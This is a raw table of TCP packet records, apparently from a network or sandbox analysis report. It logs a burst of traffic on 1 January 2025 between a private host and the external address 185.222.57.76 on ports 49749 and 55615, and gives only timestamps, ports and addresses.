Jan 1, 2025 12:32:24.945965052 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945985079 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945995092 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946014881 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946021080 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946029902 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946060896 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946063995 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946073055 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946108103 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946115971 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946116924 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946158886 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946168900 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946202040 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946232080 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946242094 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946252108 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946260929 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946269989 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946302891 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946302891 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946314096 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946343899 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946351051 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946388960 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946454048 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946464062 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946512938 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946533918 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946604967 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946615934 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946625948 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946635008 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946652889 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946661949 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946676016 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946711063 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946719885 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946721077 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946728945 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946768045 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946789026 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946799040 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946809053 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946829081 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946837902 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946850061 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946856022 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946873903 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946890116 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.946939945 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946950912 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946968079 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946973085 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.946984053 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947002888 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947011948 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947069883 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947089911 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947099924 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947108030 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947132111 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947139025 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947149038 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947158098 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947184086 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947222948 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947223902 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947233915 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947242975 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947252035 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947271109 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947278976 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947280884 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947309017 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947385073 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947386980 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947396994 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947406054 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947418928 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947438002 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947448015 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947457075 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947464943 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947467089 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947478056 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947489023 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947498083 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947506905 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947518110 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947527885 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947546005 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947556019 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947560072 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947572947 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947582006 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947591066 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947612047 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947619915 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947629929 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947640896 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947654963 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947671890 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947671890 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947683096 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947691917 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947705030 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947710037 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947727919 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947729111 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947745085 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947757006 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947766066 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947793007 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947802067 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947810888 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947846889 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947874069 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947885036 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947896004 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947906017 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947906017 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947923899 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947931051 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947932959 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947945118 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947953939 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947958946 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.947969913 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.947978020 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.948014021 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.948023081 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.948031902 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.948045015 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.948050022 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.948059082 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.948087931 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.948167086 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950412035 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950458050 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950469017 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950489998 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950520992 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950531006 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950555086 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950593948 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950598955 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950608969 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950617075 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950630903 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950653076 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950691938 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950716972 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950725079 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950769901 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950779915 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950783014 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950809002 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950817108 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950833082 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950841904 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950875044 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950887918 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950918913 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950931072 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950939894 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950962067 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.950982094 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950992107 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.950994968 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951031923 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951037884 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951040983 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951122999 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951133966 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951143026 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951149940 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951152086 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951168060 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951175928 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951186895 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951220989 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951272964 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951284885 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951297045 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951320887 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951332092 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951348066 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951396942 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951397896 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951407909 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951453924 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951456070 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951473951 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951513052 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951539040 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951602936 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951637030 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951661110 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951670885 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951693058 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951698065 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951709032 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951734066 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951782942 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951792955 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951793909 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951803923 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951812983 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951836109 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951841116 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951844931 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951870918 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951877117 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951886892 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951906919 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951920033 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951930046 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951941013 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.951966047 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951976061 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.951988935 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952017069 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952027082 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952042103 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952059984 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952069998 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952080965 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952119112 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952126026 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952128887 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952138901 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952157974 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952193975 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952203035 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952213049 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952234983 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952238083 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952246904 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952272892 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952294111 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952303886 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952323914 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952323914 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952333927 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952359915 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952361107 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952370882 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952395916 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952430964 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952430964 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952440023 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952449083 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952459097 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952472925 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952486992 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952491045 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952513933 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952523947 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952529907 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952550888 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952565908 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952574968 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952605963 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952615023 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952621937 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952624083 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952642918 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952652931 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952672958 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952687025 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952696085 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952721119 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952722073 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952732086 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952759027 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952780008 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952790022 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952805996 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952815056 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952819109 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952832937 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952855110 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952864885 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952878952 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952883005 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952892065 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952923059 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952927113 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.952930927 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952965975 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.952974081 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953001976 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953027964 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953036070 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953037024 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953052044 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953059912 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953069925 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953078985 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953089952 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953102112 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953138113 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953145027 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953146935 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953171015 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953178883 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953213930 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953372955 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953382015 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953389883 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953397989 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953401089 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953408957 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953418016 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953425884 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953430891 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.953438997 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953449011 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953457117 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953464985 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953480005 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953488111 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953545094 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953552961 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953572989 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953581095 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953603029 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953609943 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953644991 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953691006 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.953700066 CET	55615	49749	185.222.57.76	192.168.2.4
